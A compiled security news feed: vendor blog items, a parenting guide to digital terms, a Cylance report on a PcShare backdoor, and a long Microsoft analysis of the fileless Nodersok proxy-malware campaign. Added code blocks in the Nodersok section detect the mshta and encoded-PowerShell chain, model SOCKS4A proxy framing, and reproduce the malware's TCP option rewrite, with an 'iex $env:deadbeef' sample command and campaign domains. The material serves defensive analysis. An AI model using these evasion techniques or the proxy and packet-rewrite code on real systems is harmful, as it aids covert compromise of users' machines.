For governments, companies and individuals alike, Cisco’s Cybersecurity Awareness Month site offers events, activities and educational content, and ways to get involved. The Cisco Trust Center also offers resources to help you with security, data protection and privacy. Both feature links to security reports, videos, threat intelligence, thought leadership and more that will keep you informed.

McAfee Receives the 2019 Security Excellence Award From IoT Evolution

If you’re like most users, you’ve probably adopted several smart devices into your home over the last few years. Whether it be voice assistants, smart TVs, thermostats, or gaming systems, IoT devices help make our lives easier. But with greater connectivity also comes greater exposure to online threats. However, that doesn’t mean users should avoid using IoT technology altogether. With the help of smart security, users can feel safe and protected as they bring new gadgets into their lives. Solutions like McAfee Secure Home Platform, which is now the winner of the IoT Security Excellence Award, can help users connect with confidence.

Here at McAfee, we know smart security is more important now than ever before. That’s why we work tirelessly to ensure that our solutions provide consumers with the best protection possible. For example, McAfee Secure Home Platform provides automatic protection for the entire home network by automatically securing connected devices through a router with McAfee protection. It’s through the proactive evolution of our products that McAfee Secure Home Platform has received this 2019 IoT Security Excellence Award from IoT Evolution World, the leading publication covering IoT technologies.

The IoT Security Excellence Award celebrates the most innovative products and solutions in the world of IoT. It honors technology empowered by the new availability of information being deduced, inferred, and directly gathered from sensors, systems, and anything else that is supporting better business and personal decisions. Winners of this award are recognized for their innovation in gathering and managing information from connected devices that often are not associated with IoT.

“We are thrilled that McAfee Secure Home Platform has been recognized by IoT Evolution World as a recipient of the 2019 IoT Evolution Security Excellence Award. We continue to prioritize creating solutions that lead with ease of use and first-class protection, in order for consumers to best protect every connected device in their homes.” – Gary Davis, Chief Consumer Security Evangelist at McAfee.

As long as technology continues to evolve, so will the threat landscape. This is what drives us to keep developing leading solutions that help you and your loved ones connect with confidence. Solutions like McAfee Secure Home Platform are leading the charge in providing top home network security while still empowering users to enjoy their smart devices.

To stay updated on the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee Receives the 2019 Security Excellence Award From IoT Evolution appeared first on McAfee Blogs.

How long before quantum computers break encryption?

The verdict is in: quantum computing poses an existential threat to asymmetric cryptography algorithms like RSA and ECC that underpin practically all current Internet security. This comes straight from the National Academy of Science’s Committee on Technical Assessment of the Feasibility and Implications of Quantum Computing. The inevitable follow-up: OK, so how much time do we have before we’re living in a post-quantum world? The short answer is, nobody knows. That’s not for lack of … More

The post How long before quantum computers break encryption? appeared first on Help Net Security.

A proactive approach to cybersecurity requires the right tools, not more tools

The key challenge facing security leaders and putting their organizations at risk of breach is misplaced confidence that the abundance of technology investments they have made has strengthened their security posture, according to a study conducted by Forrester Consulting. The study surveyed over 250 senior security decision-makers in North America and Europe. Participants included CISO, CIO, IT and security VPs from organizations ranging from 3,000 to over 25,000 employees. Currently, security leaders employ a variety … More

The post A proactive approach to cybersecurity requires the right tools, not more tools appeared first on Help Net Security.

DevSecOps is emerging as the main methodology for securing cloud-native applications

Only 8 percent of companies are securing 75 percent or more of their cloud-native applications with DevSecOps practices today, with that number jumping to 68 percent of companies securing 75 percent or more of their cloud-native applications with DevSecOps practices in two years, according to ESG. The study results also revealed that API-related vulnerabilities are the top threat concern (63 percent of respondents) when it comes to organizations use of serverless. Overall, the study analyzed … More

The post DevSecOps is emerging as the main methodology for securing cloud-native applications appeared first on Help Net Security.

ThreatConnect Platform: Security insight for sound decision-making

In this interview, Jason Spies, VP of Engineering & Chief Architect, ThreatConnect, talks about the powerful features of the ThreatConnect Platform. Oftentimes, the ability for a product to support growth (scale effectively) is forgotten in lieu of a customer being dazzled by individual features or capabilities. Can you talk about the importance of technical considerations when it comes to a Platform scaling to support multiple teams and growing demands overtime? Bottom line, it’s a balance … More

The post ThreatConnect Platform: Security insight for sound decision-making appeared first on Help Net Security.

5 Digitally-Rich Terms to Define and Discuss with Your Kids

Over the years, I’ve been the star of a number of sub-stellar parenting moments. More than once, I found myself reprimanding my kids for doing things that kids do — things I never stopped to teach them otherwise.

Like the time I reprimanded my son for not thanking his friend’s mother properly before we left a birthday party. He was seven when his etiquette deficit disorder surfaced. Or the time I had a meltdown because my daughter cut her hair off. She was five when she brazenly declared her scorn for the ponytail.

The problem: I assumed they knew.

Isn’t the same true when it comes to our children’s understanding of the online world? We can be quick to correct our kids when they fail to exercise the best judgment or handle a situation the way we think they should online.

But often what’s needed first is a parental pause to ask ourselves: Am I assuming they know? Have I taken the time to define and discuss the issue?

With that in mind, here are five digitally-rich terms dominating the online conversation. If possible, find a few pockets of time this week and start from the beginning — define the words, then discuss them with your kids. You may be surprised where the conversation goes.

5 digital terms that matter

Internet Privacy

Internet privacy is the personal privacy that every person is entitled to when they display, store, or provide information regarding themselves on the internet. 

Highlight: We see and use this word often but do our kids know what it means? Your personal information has value, like money. Guard it. Lock it down. Also, respect the privacy of others. Be mindful about accidentally giving away a friend’s information, sharing photos without permission, or sharing secrets. Remember: Nothing shared online (even in a direct message or private text) is private—nothing. Smart people get hacked every day.
Ask: Did you know that when you go online, websites and apps track your activity to glean personal information? What are some ways you can control that? Do you know why people want your data?
Act: Use privacy settings on all apps, turn off cookies in search engines, review privacy policies of apps, and create bullet-proof passwords.

Digital Wellbeing

Digital wellbeing (also called digital wellness) is an ongoing awareness of how social media and technology impacts our emotional and physical health.

Highlight: Every choice we make online can affect our wellbeing or alter our sense of security and peace. Focusing on wellbeing includes taking preventative measures, making choices, and choosing behaviors that help us build a healthy relationship with technology. Improving one’s digital wellbeing is an ongoing process.
Ask: What do you like to do online that makes you feel good about yourself? What kinds of interactions make you feel anxious, excluded, or sad? How much time online do you think is healthy?
Act: Digital wellness begins at home. To help kids “curb the urge” to post so frequently, give them a “quality over quantity” challenge. Establish tech curfews and balance screen time with green time. Choose apps and products that include wellbeing features in their design. Consider security software that blocks inappropriate apps, filters disturbing content, and curbs screen time.

Media Literacy

Media literacy is the ability to access, analyze, evaluate, and create media in a variety of forms. It’s the ability to think critically about the messages you encounter.

Highlight: Technology has redefined media. Today, anyone can be a content creator and publisher online, which makes it difficult to discern the credibility of the information we encounter. The goal of media literacy curriculum in education is to equip kids to become critical thinkers, effective communicators, and responsible digital citizens.
Ask: Who created this content? Is it balanced or one-sided? What is the author’s motive behind it? Should I share this? How might someone else see this differently?
Act: Use online resources such as Cyberwise to explore concepts such as clickbait, bias, psychographics, cyberethics, stereotypes, fake news, critical thinking/viewing, and digital citizenship. Also, download Google’s new Be Internet Awesome media literacy curriculum.

Empathy

Empathy is stepping into the shoes of another person to better understand and feel what they are going through.

Highlight: Empathy is a powerful skill in the online world. Empathy helps dissolve stereotypes, perceptions, and prejudices. According to Dr. Michele Borba, empathetic children practice nine habits that run contrary to today’s “selfie syndrome” culture. Empathy-building habits include moral courage, kindness, and emotional literacy. Without empathy, people can be “mean behind the screen” online. But remember: there are also many people practicing empathy online who are genuine “helpers.” Be a helper.
Ask: How can you tell when someone “gets you” or understands what you are going through? How do they express that? Is it hard for you to stop and try to relate to what someone else is feeling or see a situation through their eyes? What thoughts or emotions get in your way?
Act: Practice focusing outward when you are online. Is there anyone who seems lonely, excluded, or in distress? Offer a kind word or an encouragement, and ask questions to learn more about them. (Note: Empathy is an emotion/skill kids learn over time with practice and parental modeling.)

Cyberbullying

Cyberbullying is the use of technology to harass, threaten, embarrass, shame, or target another person online.

Highlight: Not all kids understand the scope of cyberbullying, which can include spreading rumors, sending inappropriate photos, gossiping, subtweeting, and excessive messaging. Kids often mistake cyberbullying for digital drama and overlook abusive behavior. While kids are usually referenced in cyberbullying, the increase in adults involved in online shaming, unfortunately, is quickly changing that ratio.
Ask: Do you think words online can hurt someone in a way, more than words said face-to-face? Why? Have you ever experienced cyberbullying? Would you tell a parent or teacher about it? Why or why not?
Act: Be aware of changes in your child’s behavior and pay attention to his or her online communities. Encourage kids to report bullying (aimed at them or someone else). Talk about what it means to be an Upstander when bullied. If the situation is unresolvable and escalates to threats of violence, report it immediately to law enforcement.

We hope these five concepts spark some lively discussions around your dinner table this week. Depending on the age of your child, you can scale the conversation to fit. And don’t be scared off by eye rolls or sighs, parents. Press into the hard conversations and be consistent. Your voice matters in their noisy, digital world.

The post 5 Digitally-Rich Terms to Define and Discuss with Your Kids appeared first on McAfee Blogs.

Cylance Security Researchers Warn Technology Firms in Southeast Asia About Chinese Open-Source Backdoor

Attacks on technology businesses in Southeast Asia by a suspected Chinese threat actor employ a modified version of the open-source PcShare backdoor, security researchers at BlackBerry Cylance warn.

The attackers also used a trojanized screen-reader application that mimics the built-in Windows Narrator accessibility (“Ease of Access”) feature, gaining remote control over infected systems without needing to steal credentials.

The Chinese open-source backdoor, PcShare, was modified specifically for this campaign with additional C&C encryption and proxy bypass. The operators also stripped any unused features from the code.

The malware is executed via DLL side-loading on the victim’s machine. Specifically, the backdoor is loaded by the legitimate NVIDIA Smart Maximize Helper Host executable, which the researchers found to be a component of the NVIDIA GPU graphics driver package.

After the initial compromise, a number of tools are used, many of them based on software publicly available on Chinese programming portals. One of these is a trojanized Narrator executable that abuses Microsoft accessibility features to obtain SYSTEM-level access.

The attackers used memory injection so the main backdoor binary never touches the disk, and encoded the payload based on its execution path to evade detection. The loader’s configuration is stored in plain text, but the URL it contains is not the real C&C address; it points instead to a remote file holding the C&C communication details.

While the threat actor has used the same PcShare payload across multiple attacks, they often modified the side-loaded DLL for each target to update configuration details such as the C&C IP addresses and victim identifiers.

The malware establishes persistence by adding a registry entry, and creates mutexes so that only one instance of the payload injection routine runs at a time.

Backdoor features include several operating modes (including SSH and Telnet, automatic update, and upload/download modes), traffic compression using a custom LZW algorithm, encrypted C&C communication using the PolarSSL library, and proxy authentication using local user credentials.

The malware’s remote-administration capabilities include listing, creating, renaming and deleting files and directories; listing and killing processes; editing registry keys and values; listing and manipulating services; enumerating and controlling windows; running binaries; downloading additional files from the C&C or a URL; uploading files to the C&C; spawning a command-line shell; displaying message boxes; and opening URLs.

The fake Narrator app used by the threat actor does not replace the legitimate application; instead it is a separate copy that mimics the Narrator user interface. The trojanized application is deployed after the attackers obtain administrative rights on the system, and it gives them SYSTEM-level access to the machine.

The fake Narrator app was first seen four years ago, but the threat actor keeps modifying it to fit the victims’ environments, the researchers say. The tool appears to have been used in only a very small number of attacks.

BlackBerry Cylance believes the actor is of Chinese origin, based on the use of Chinese open-source projects and the geographical location of the victims.

“As of today, precise attribution of these attacks has proven elusive. The use of PcShare backdoor, as well as the geographical location of the victims, bear similarities to a known threat actor called Tropic Trooper, which is actively targeting government institutions and heavy industry companies in Taiwan and Philippines,” BlackBerry Cylance says.

The post Cylance Security Researchers Warn Technology Firms in Southeast Asia About Chinese Open-Source Backdoor appeared first on .

How to start achieving visibility in the cloud

As a security executive, you have a curious gig. On one hand, you’re responsible for securing your organization across multiple systems, networks, clouds, and geographies. On the other, your team owns none of those things. Organizing resources in a way that makes visibility possible beyond the data center (assuming you have that to begin with) is hard. That’s because the way you achieve visibility in the cloud, or at the edge, is fundamentally different than … More

The post How to start achieving visibility in the cloud appeared first on Help Net Security.

Should the National Security Council restore the cybersecurity coordinator role?

Former national security advisor John Bolton’s elimination of the cybersecurity coordinator role in May 2018 came as a surprise to many in the cybersecurity industry, especially security professionals that are tasked with securing federal networks, protecting critical infrastructure and providing cybersecurity governance. The role was created to help orchestrate and integrate the government’s cyber policies, make sure federal agencies have adequate cybersecurity funding and coordinate responses to major cybersecurity incidents. Many believe that the abolishment … More

The post Should the National Security Council restore the cybersecurity coordinator role? appeared first on Help Net Security.

Year-over-year malware volume increased by 64%

The most common domains attackers use to host malware and launch phishing attacks include several subdomains of legitimate sites and Content Delivery Networks (CDNs) such as CloudFlare.net, CloudFront.net (which belongs to Amazon), SharePoint and Amazonaws.com, along with legitimate file-sharing websites like my[.]mixtape[.]moe, according to WatchGuard. The report for Q2 2019 also highlights that modules from the popular Kali Linux penetration testing tool made the top ten malware list for the first time. Trojan.GenericKD, which covers … More

The post Year-over-year malware volume increased by 64% appeared first on Help Net Security.

Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware

We’ve discussed the challenges that fileless threats pose in security, and how Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) employs advanced strategies to defeat these sophisticated threats. Part of the slyness of fileless malware is their use of living-off-the-land techniques, which refer to the abuse of legitimate tools, also called living-off-the-land binaries (LOLBins), that already exist on machines through which malware can persist, move laterally, or serve other purposes.

But what happens when attackers require functionality beyond what’s provided by standard LOLBins? A new malware campaign we dubbed Nodersok decided to bring its own LOLBins—it delivered two very unusual, legitimate tools to infected machines:

  • Node.exe, the Windows implementation of the popular Node.js framework used by countless web applications
  • WinDivert, a powerful network packet capture and manipulation utility

Like any LOLBin, these tools are not malicious or vulnerable; they provide important capabilities for legitimate use. It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands). However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.

While the file-based aspect of the attack was very tricky to detect, its behavior produces a visible footprint that stands out clearly for anyone who knows where to look. With its array of advanced defensive technologies, Microsoft Defender ATP defeated the threat at numerous points of dynamic detection throughout the attack chain.

Attack overview

The Nodersok campaign has been pestering thousands of machines in the last several weeks, with most targets located in the United States and Europe. The majority of targets are consumers, but about 3% of encounters are observed in organizations in sectors like education, professional services, healthcare, finance, and retail.

 

Figure 1. Distribution of Nodersok’s enterprise targets by country and by sector

The campaign is particularly interesting not only because it employs advanced fileless techniques, but also because it relies on an elusive network infrastructure that causes the attack to fly under the radar. We uncovered this campaign in mid-July, when suspicious patterns in the anomalous usage of MSHTA.exe emerged from Microsoft Defender ATP telemetry. In the days that followed, more anomalies stood out, showing up to a ten-fold increase in activity:

Figure 2. Trending of Nodersok activity from August to September, 2019

After a process of tracking and analysis, we pieced together the infection chain:

Figure 3. Nodersok attack chain

Like the Astaroth campaign, every step of the infection chain runs only legitimate LOLBins, either from the machine itself (mshta.exe, powershell.exe) or downloaded third-party ones (node.exe, WinDivert.dll/.sys). All of the relevant functionality resides in scripts and shellcode that almost always arrive encrypted, are decrypted, and run only in memory. No malicious executable is ever written to disk.

This infection chain was consistently observed in several machines attacked by the latest variant of Nodersok. Other campaigns (possibly earlier versions) with variants of this malware (whose main JavaScript payload was named 05sall.js or 04sall.js) were observed installing malicious encoded PowerShell commands in the registry that would end up decoding and running the final binary executable payload.

Initial access: Complex remote infrastructure

The attack begins when a user downloads and runs an HTML application (HTA) file named Player1566444384.hta. The digits in the file name differ in every attack. Analysis of Microsoft Defender ATP telemetry points to compromised advertisements as the most likely infection vector for delivering the HTA files. The mshta.exe tool (which runs when an HTA file runs) was launched with the -embedding command-line parameter, which typically indicates that the launch action was initiated by the browser.

Furthermore, immediately prior to the execution of the HTA file, the telemetry always shows network activity towards suspicious advertisement services (which may vary slightly across infections), and a consistent access to legitimate content delivery service Cloudfront. Cloudfront is not a malicious entity or service, and it was likely used by the attackers exactly for that reason: because it’s not a malicious domain, it won’t likely raise alarms. Examples of such domains observed in several campaigns are:

  • d23cy16qyloios[.]cloudfront[.]net
  • d26klsbste71cl[.]cloudfront[.]net
  • d2d604b63pweib[.]cloudfront[.]net
  • d3jo79y1m6np83[.]cloudfront[.]net
  • d1fctvh5cp9yen[.]cloudfront[.]net
  • d3cp2f6v8pu0j2[.]cloudfront[.]net
  • dqsiu450ekr8q[.]cloudfront[.]net

It’s possible that these domains were abused to deliver the HTA files without alerting the browser. Another content delivery service abused later on in the attack chain is Cdn77. Some examples of observed URLs include:

  • hxxps://1292172017[.]rsc[.]cdn77[.]org/images/trpl[.]png
  • hxxps://1292172017[.]rsc[.]cdn77[.]org/imtrack/strkp[.]png

This same strategy was also used by the Astaroth campaign, where the malware authors hosted their malware on the legitimate storage.googleapis.com service.

First-stage JavaScript

When the HTA file runs, it tries to reach out to a randomly named domain to download additional JavaScript code. The domains used in this first stage are short-lived: they are registered and brought online and, after a day or two (the span of a typical campaign), they are dropped and their related DNS entries are removed. This can make it more difficult to investigate and retrieve the components that were delivered to victims. Examples of domains observed include:

  • du0ohrealgeek[.]org – active from August 12 to 14
  • hi5urautopapyrus[.]org – active from April 21 to 22
  • ex9ohiamistanbul[.]net – active from August 1 to 2
  • eek6omyfilmbiznetwork[.]org – active from July 23 to 24

This stage is just a downloader: it tries to retrieve either a JavaScript or an Extensible Stylesheet Language (XSL) file from the command-and-control (C&C) domain. These files have semi-random names like 1566444384.js and 1566444384.xsl, where the digits are different in every download. After this file is downloaded and runs, it contacts the remote C&C domain to download an RC4-encrypted file named 1566444384.mp4 and a decryption key from a file named 1566444384.flv. When decrypted, the MP4 file is an additional JavaScript snippet that starts PowerShell:

Interestingly, it hides the malicious PowerShell script in an environment variable named “deadbeef” (first line), then it launches PowerShell with an encoded command (second line) that simply runs the contents of the “deadbeef” variable. This trick, which is used several times during the infection chain, is usually employed to hide the real malicious script so that it does not appear in the command-line of a PowerShell process.
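
Two of the traits described so far, the browser-spawned mshta.exe running a Player<digits>.hta with -Embedding, and PowerShell started with an encoded command whose only job is to execute an environment variable, can be checked directly in process-creation telemetry. The following is an added example, not Microsoft's detection logic and not code from the campaign: it decodes -EncodedCommand arguments (base64 over UTF-16LE) and flags the chain. The event records, their field names (parentImage, image, commandLine, pid) and the file paths are constructed for the demo; the stage-2 base64 is generated from its plaintext so the sample is exact.

```javascript
// Added example: behavioral check over constructed process-creation events.
// Not Microsoft Defender ATP logic; field names are this example's own.
const BROWSERS = new Set(['chrome.exe', 'firefox.exe', 'msedge.exe', 'iexplore.exe']);

function baseName(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Find the -e / -ec / -enc / -EncodedCommand argument in a PowerShell command line.
function extractEncodedCommand(cmdline) {
  const m = /(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)/i.exec(cmdline);
  return m ? m[1] : null;
}

// -EncodedCommand is base64 over UTF-16LE text, not UTF-8.
function decodeEncodedCommand(b64) {
  return Buffer.from(b64, 'base64').toString('utf16le');
}

function analyzeProcessEvents(events) {
  const findings = [];
  for (const ev of events) {
    const image = baseName(ev.image);
    const parent = baseName(ev.parentImage);
    const cl = ev.commandLine;

    // Trait 1: a browser launching mshta.exe with -Embedding (HTA handed over by the browser).
    if (image === 'mshta.exe' && BROWSERS.has(parent) && /-embedding\b/i.test(cl)) {
      const detail = /Player\d+\.hta/i.test(cl) ? 'Player<digits>.hta name pattern' : 'HTA from browser';
      findings.push({ pid: ev.pid, rule: 'browser-spawned mshta -Embedding', detail });
    }

    // Trait 2: encoded PowerShell whose decoded body runs an environment variable via iex.
    if (image === 'powershell.exe') {
      const b64 = extractEncodedCommand(cl);
      if (b64) {
        const script = decodeEncodedCommand(b64);
        const envExec = /\b(?:iex|invoke-expression)\b[^\n;]*\$env:(\w+)/i.exec(script)
          || /\$env:(\w+)[^\n;]*\|\s*(?:iex|invoke-expression)\b/i.exec(script);
        if (envExec) {
          findings.push({
            pid: ev.pid,
            rule: 'encoded PowerShell executes environment variable',
            detail: `variable ${envExec[1]}`,
            decoded: script,
          });
        }
      }
    }
  }
  return findings;
}

// Constructed telemetry for the chain in this post (paths and pids are made up).
const STAGE2 = Buffer.from('iex $env:deadbeef', 'utf16le').toString('base64');
const SAMPLE_EVENTS = [
  { pid: 4001, parentImage: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
    image: 'C:\\Windows\\System32\\mshta.exe',
    commandLine: '"C:\\Windows\\System32\\mshta.exe" "C:\\Users\\alice\\Downloads\\Player1566444384.hta" -Embedding' },
  { pid: 4002, parentImage: 'C:\\Windows\\System32\\mshta.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    commandLine: `powershell.exe -NoP -W Hidden -e ${STAGE2}` },
  // Benign control: an encoded command that carries its own script body.
  { pid: 4003, parentImage: 'C:\\Windows\\explorer.exe',
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    commandLine: `powershell.exe -EncodedCommand ${Buffer.from('Get-Date', 'utf16le').toString('base64')}` },
];

console.log(analyzeProcessEvents(SAMPLE_EVENTS));
```

The second rule is the useful one: the command line of the PowerShell process looks harmless after decoding because the real script lives in the `deadbeef` variable, and that absence of a script body is exactly the signal to alert on. The variable's contents are not on the command line, so recovering them needs the parent's environment block or AMSI, which is why the post pairs command-line scanning with AMSI instrumentation.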

Second-stage PowerShell

Nodersok’s infection continues by launching several instances of PowerShell to download and run additional malicious modules. All the modules are hosted on the C&C servers in RC4-encrypted form and are decrypted on the fly before they run on the device. The following steps are performed by the various instances of PowerShell:

  • Download module.avi, a module that attempts to:
    • Disable Windows Defender Antivirus
    • Disable Windows updates
    • Run binary shellcode that attempts elevation of privilege by using auto-elevated COM interface
  • Download additional modules trpl.png and strkp.png hosted on a Cdn77 service
  • Download legitimate node.exe tool from the official nodejs.org website
  • Drop the WinDivert packet capture library components WinDivert.dll, WinDivert32.sys, and WinDivert64.sys
  • Execute a shellcode that uses WinDivert to filter and modify certain outgoing packets
  • Finally, drop the JavaScript payload along with some Node.js modules and libraries required by it, and run it via node.exe

This last JavaScript is the actual final payload written for the Node.js framework that turns the device into a proxy. This concludes the infection, at the end of which the network packet filter is active and the machine is working as a potential proxy zombie. When a machine turns into a proxy, it can be used by attackers as a relay to access other network entities (websites, C&C servers, compromised machines, etc.), which can allow them to perform stealthy malicious activities.

Node.js-based proxy engine

This is not the first threat to abuse Node.js. Some cases have been observed in the past (for example this ransomware from early 2016). However, using Node.js is a peculiar way to spread malware. Besides being clean and benign, Node.exe also has a valid digital signature, allowing a malicious JavaScript to operate within the context of a trusted process. The JavaScript payload itself is relatively simple: it only contains a set of basic functions that allows it to act as a proxy for a remote entity.

Figure 4. A portion of the malicious Node.js-based proxy

The code seems to be still in its infancy and in development, but it does work. It has two purposes:

  1. Connect back to the remote C&C, and
  2. Receive HTTP requests to proxy back to it

It supports the SOCKS4A protocol. While we haven’t observed network requests coming from attackers, we wrote what the Node.js-based C&C server application might look like: a server that sends HTTP requests to the infected clients that connect back to it, and receives the responses from those clients. We slightly modified the malicious JavaScript to make it log meaningful messages, ran the JavaScript server, ran the JavaScript malware, and it proxied HTTP requests as expected:

Figure 5. The debug messages are numbered to make it easier to follow the execution flow

The server starts, then the client starts and connects to it. In response, the server sends an HTTP request (using the SOCKS4A protocol) to the client. The request is a simple HTTP GET. The client proxies the HTTP request to the target website and returns the HTTP response (200 OK) and the HTML page back to the server. This test demonstrates that it’s possible to use this malware as a proxy.
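
The exchange in Figure 5 rests on SOCKS4A framing, which is compact enough to show in full. The block below is an added example, not Nodersok's code and not Microsoft's test server: it encodes and parses SOCKS4A CONNECT requests and SOCKS4 replies as plain Buffer functions, then runs the exchange in memory, with the "C&C" writing a CONNECT followed by the HTTP GET it wants relayed and the "bot" parsing the CONNECT and locating the GET behind it. The role inversion is the point: in Nodersok the bot dials out, and the C&C then sends requests down that connection. The host name, bot identifier and the absence of real sockets are this example's assumptions.

```javascript
// Added example: SOCKS4A request/reply framing and an in-memory model of the
// C&C -> bot exchange. Not code from the campaign.

// SOCKS4A CONNECT: VN=4, CD=1, DSTPORT (big-endian), DSTIP=0.0.0.x with x != 0
// (the SOCKS4A marker: "resolve the hostname that follows"), USERID NUL, HOSTNAME NUL.
function encodeSocks4aConnect(host, port, userId = '') {
  if (port < 1 || port > 65535) throw new RangeError('bad port');
  return Buffer.concat([
    Buffer.from([4, 1, (port >> 8) & 0xff, port & 0xff, 0, 0, 0, 1]),
    Buffer.from(userId, 'latin1'), Buffer.from([0]),
    Buffer.from(host, 'latin1'), Buffer.from([0]),
  ]);
}

// Parse a SOCKS4 (real IPv4) or SOCKS4A (hostname) request. Returns the fields and
// the number of bytes consumed, so whatever follows (the proxied HTTP request) can be found.
function parseSocks4Request(buf) {
  if (buf.length < 9 || buf[0] !== 4) throw new Error('not a SOCKS4 request');
  const cmd = buf[1];
  const port = buf.readUInt16BE(2);
  const ip = Array.from(buf.subarray(4, 8));
  const userEnd = buf.indexOf(0, 8);
  if (userEnd < 0) throw new Error('unterminated USERID');
  const userId = buf.toString('latin1', 8, userEnd);
  let consumed = userEnd + 1;
  const isSocks4a = ip[0] === 0 && ip[1] === 0 && ip[2] === 0 && ip[3] !== 0;
  let host = ip.join('.');
  if (isSocks4a) {
    const hostEnd = buf.indexOf(0, consumed);
    if (hostEnd < 0) throw new Error('unterminated hostname');
    host = buf.toString('latin1', consumed, hostEnd);
    consumed = hostEnd + 1;
  }
  return { cmd, port, host, userId, isSocks4a, consumed };
}

// Reply: VN=0, CD=90 (granted) or 91 (rejected), then DSTPORT/DSTIP (ignored by clients).
function encodeSocks4Reply(granted, port = 0, ip = [0, 0, 0, 0]) {
  return Buffer.from([0, granted ? 90 : 91, (port >> 8) & 0xff, port & 0xff, ...ip]);
}

function parseSocks4Reply(buf) {
  if (buf.length !== 8 || buf[0] !== 0) throw new Error('not a SOCKS4 reply');
  return { granted: buf[1] === 90, code: buf[1] };
}

// In-memory model of Figure 5: the "C&C" sends CONNECT + GET in one write; the "bot"
// parses the CONNECT, answers, and hands the remainder to the HTTP layer. No sockets.
function simulateExchange(targetHost, targetPort, botId) {
  const connect = encodeSocks4aConnect(targetHost, targetPort, botId);
  const httpGet = Buffer.from(`GET / HTTP/1.1\r\nHost: ${targetHost}\r\n\r\n`, 'latin1');
  const wire = Buffer.concat([connect, httpGet]); // what the bot reads from the C&C

  const req = parseSocks4Request(wire);
  const granted = req.cmd === 1 && req.host.length > 0; // a real bot would now dial req.host:req.port
  const reply = parseSocks4Reply(encodeSocks4Reply(granted, req.port));
  const forwarded = wire.subarray(req.consumed).toString('latin1');
  return { request: req, granted: reply.granted, forwarded };
}

console.log(simulateExchange('example.test', 80, 'bot-0001'));
```

For a defender, the 0.0.0.x destination followed by a NUL-terminated hostname is the distinctive part: it appears in the bot's inbound traffic (the C&C speaks it to the bot), which is the reverse of where a SOCKS server normally sees it.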

05sall.js: A variant of Nodersok

As mentioned earlier, there exist other variants of this malware. For example, we found one named 05sall.js (possibly an earlier version). It’s similar in structure to the one described above, but the payload was not developed in Node.js (rather it was an executable). Furthermore, beyond acting as a proxy, it can run additional commands such as update, terminate, or run shell commands.

Figure 6. The commands that can be processed by the 05sall.js variant.

The malware can also process configuration data in JSON format. For example, this configuration was encoded and stored in the registry in an infected machine:

Figure 7. Configuration data exposing component and file names

The configuration is an indication of the modular nature of the malware. It shows the names of two modules being used in this infection (named block_av_01 and all_socks_05).

The WinDivert network packet filtering

At this point in the analysis, there is one last loose end: what about the WinDivert packet capture library? We recovered a shellcode from one of the campaigns. This shellcode is decoded and run only in memory from a PowerShell command. It installs the following network filter (in a language recognized by WinDivert):

This means Nodersok is intercepting packets sent out to initiate a TCP connection. Once the filter is active, the shellcode is interested only in TCP packets that match the following specific format:

Figure 8. Format of TCP packets that Nodersok is interested in

The packet must have standard Ethernet and IP headers, a 20-byte TCP header, plus an additional 20 bytes of TCP options. The options must appear exactly in the order shown in the image above:

  • 02 04 XX XX – Maximum segment size
  • 01 – No operation
  • 03 03 XX – Window scale
  • 04 02 – SACK permitted
  • 08 0A XX XX XX XX XX XX XX XX – Timestamps

If packets matching this criterion are detected, Nodersok modifies them by moving the “SACK Permitted” option to the end of the packet (whose size is extended by four bytes), and replacing the original option bytes with two “No operation” bytes.

Figure 9. The format of TCP packets after Nodersok has altered it: the “SACK permitted” bytes (in red) have been moved to the end of the packet, and their original location has been replaced by “No operation” (in yellow)

It’s possible that this modification benefits the attackers; for example, it may help evade some HIPS signatures.
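
The rewrite in Figures 8 and 9 is small enough to reproduce on raw TCP bytes, which also gives a fingerprint to hunt for. The block below is an added example, not Nodersok's shellcode and not WinDivert: it parses the option block of a TCP segment, checks for the exact five-option layout, applies the same edit (SACK permitted replaced in place by two NOPs and re-appended at the end, Data Offset bumped by one word), and checks a captured segment for the post-rewrite shape. The sample SYN is constructed; the post does not say which bytes pad the extended block, so End-of-Option-List (0x00) padding is this example's assumption, and Ethernet/IP framing and checksum recomputation are left out.

```javascript
// Added example: Nodersok-style TCP option rewrite on raw TCP header bytes.
// Not the campaign's shellcode; padding bytes are assumed.
const OPT = { EOL: 0, NOP: 1, MSS: 2, WSCALE: 3, SACK_OK: 4, TIMESTAMP: 8 };

// Split a TCP option block into {kind, len} records; stops at End-of-Option-List.
function parseTcpOptions(opts) {
  const out = [];
  let i = 0;
  while (i < opts.length) {
    const kind = opts[i];
    if (kind === OPT.EOL) break;
    if (kind === OPT.NOP) { out.push({ kind, len: 1 }); i += 1; continue; }
    if (i + 1 >= opts.length) throw new Error('truncated option');
    const len = opts[i + 1];
    if (len < 2 || i + len > opts.length) throw new Error('bad option length');
    out.push({ kind, len });
    i += len;
  }
  return out;
}

// The 20-byte layout of Figure 8: MSS, NOP, window scale, SACK permitted, timestamps.
const NODERSOK_LAYOUT = [
  [OPT.MSS, 4], [OPT.NOP, 1], [OPT.WSCALE, 3], [OPT.SACK_OK, 2], [OPT.TIMESTAMP, 10],
];

function matchesNodersokLayout(opts) {
  if (opts.length !== 20) return false;
  let parsed;
  try { parsed = parseTcpOptions(opts); } catch (e) { return false; }
  return parsed.length === NODERSOK_LAYOUT.length &&
    parsed.every((o, i) => o.kind === NODERSOK_LAYOUT[i][0] && o.len === NODERSOK_LAYOUT[i][1]);
}

// The edit: bytes 8-9 (SACK permitted) become NOP NOP, "04 02" is appended, and the
// block is padded to a 32-bit boundary, four bytes longer overall (EOL padding assumed).
function rewriteOptions(opts) {
  if (!matchesNodersokLayout(opts)) throw new Error('option layout does not match');
  const head = Buffer.from(opts); // copy; the input is left untouched
  head[8] = OPT.NOP;
  head[9] = OPT.NOP;
  return Buffer.concat([head, Buffer.from([OPT.SACK_OK, 2, OPT.EOL, OPT.EOL])]);
}

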